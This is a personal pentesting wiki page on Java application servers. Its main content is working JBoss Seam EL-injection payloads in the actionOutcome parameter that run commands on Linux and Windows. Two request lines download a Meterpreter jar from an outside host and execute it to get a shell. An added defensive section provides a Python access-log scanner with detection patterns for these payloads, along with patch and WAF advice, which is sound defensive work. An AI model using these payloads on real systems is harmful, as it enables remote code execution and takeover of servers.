Java App Servers

From Rory.wiki


JBOSS

Good doc on JBOSS hacking

Auth bypass on JBOSS

Code Execution on JBOSS-Seam servers

Per [1], it's possible to get remote code execution via JBoss EL interpretation in the actionOutcome parameter. Interestingly, when I followed through the setup from this blog, the final PoC didn't work for me, but from this post on Stack Overflow the following exploit did:

On Linux this command works ok:

 actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir%20/tmp/pwned')}

On Windows this one does:

 actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('c:/windows/system32/notepad.exe')}

Worth reading the original blog post to get the process for confirming which element of the getDeclaredMethods() array is the exec method (the [6] in the lines above), as apparently it can differ from OS to OS: the JVM does not guarantee any particular ordering for getDeclaredMethods(), so the index has to be confirmed per target.

Commands for getting a shell on Linux using a Java Meterpreter payload:

 /seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('wget%20-O%20/tmp/lin.jar2%20http://www.mccune.org.uk/lin.jar')}
 /seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('java%20-jar%20/tmp/lin.jar')}
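From the defensive side, the requests above leave a very recognisable trace in the web server access log: a Seam navigation parameter (actionOutcome) whose value contains an EL expression marker (#{ or ${) and reflection calls such as getClass().forName('java.lang.Runtime'). The script below is an added example, not code from the wiki page or from any of the linked posts; it scans combined-format access log lines, percent-decodes parameter values repeatedly (so double-encoded %2523 is still caught), and flags any parameter carrying an EL marker, rating it "high" when reflection or Runtime calls appear alongside it. The log lines in SAMPLE_LOG are constructed for the example; the hosts, timestamps and sizes are made up.

```python
"""Flag JBoss Seam EL-injection attempts (actionOutcome-style payloads) in access logs.

Added example for this wiki page; not part of the original post. Assumes
Apache/Tomcat "combined" log format. SAMPLE_LOG below is constructed data.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# An EL expression opener inside a parameter value is never legitimate input
# to a Seam/JSF page, so it is a strong signal on its own.
EL_MARKER_RE = re.compile(r'[#$]\{')
# Reflection / process-execution idioms seen in actionOutcome payloads.
DANGEROUS_RE = re.compile(
    r'getClass\(\)|forName\(|java\.lang\.Runtime|\.exec\(|ProcessBuilder', re.I
)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so %2523 -> %23 -> '#' is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return [(param_name, severity)] for one request target ("/path?query").

    severity is "high" when an EL marker is combined with reflection/Runtime
    idioms, "medium" for a bare EL marker.
    """
    findings = []
    query = urlsplit(target).query  # splits on the first '?', as the server does
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)  # parse_qsl already decoded one layer
        if not EL_MARKER_RE.search(value):
            continue
        severity = "high" if DANGEROUS_RE.search(value) else "medium"
        findings.append((name, severity))
    return findings


def scan_log(lines):
    """Parse each access-log line and return a list of alert dicts."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = inspect_request(m.group("target"))
        if findings:
            alerts.append({
                "host": m.group("host"),
                "time": m.group("time"),
                "status": m.group("status"),
                "path": urlsplit(m.group("target")).path,
                "findings": findings,
            })
    return alerts


# Constructed sample log: one benign page load, one single-encoded EL payload,
# one double-encoded EL payload, and one benign query with an encoded '&'.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2013:13:55:36 +0000] "GET /seam-booking/home.seam HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2013:13:55:40 +0000] "GET /seam-booking/home.seam'
    '?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(\'java.lang.Runtime\')}'
    ' HTTP/1.1" 500 1201',
    '198.51.100.9 - - [10/Oct/2013:13:56:02 +0000] "GET /seam-booking/home.seam'
    '?actionOutcome=%252523%257Bexpressions.getClass()%257D HTTP/1.1" 200 88',
    '198.51.100.9 - - [10/Oct/2013:13:56:10 +0000] "GET /seam-booking/search.seam?q=hotel%20%26%20spa HTTP/1.1" 200 4400',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["host"], alert["status"], alert["path"], alert["findings"])
```

Point scan_log at real log lines (for example, `scan_log(open("access_log"))`) to triage historical traffic; a 200 or 500 response to a flagged request is worth investigating either way, since the EL is evaluated before the navigation rule fails. Detection is a stop-gap: the durable fix is applying the vendor patch for Seam so that actionOutcome is no longer evaluated as EL, and fronting the server with a WAF rule that rejects `#{` and `${` in query parameters.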


Tomcat

XSS in calendar sample

List of CVEs for Tomcat 5

List of CVEs for Tomcat 6

List of CVEs for Tomcat 4
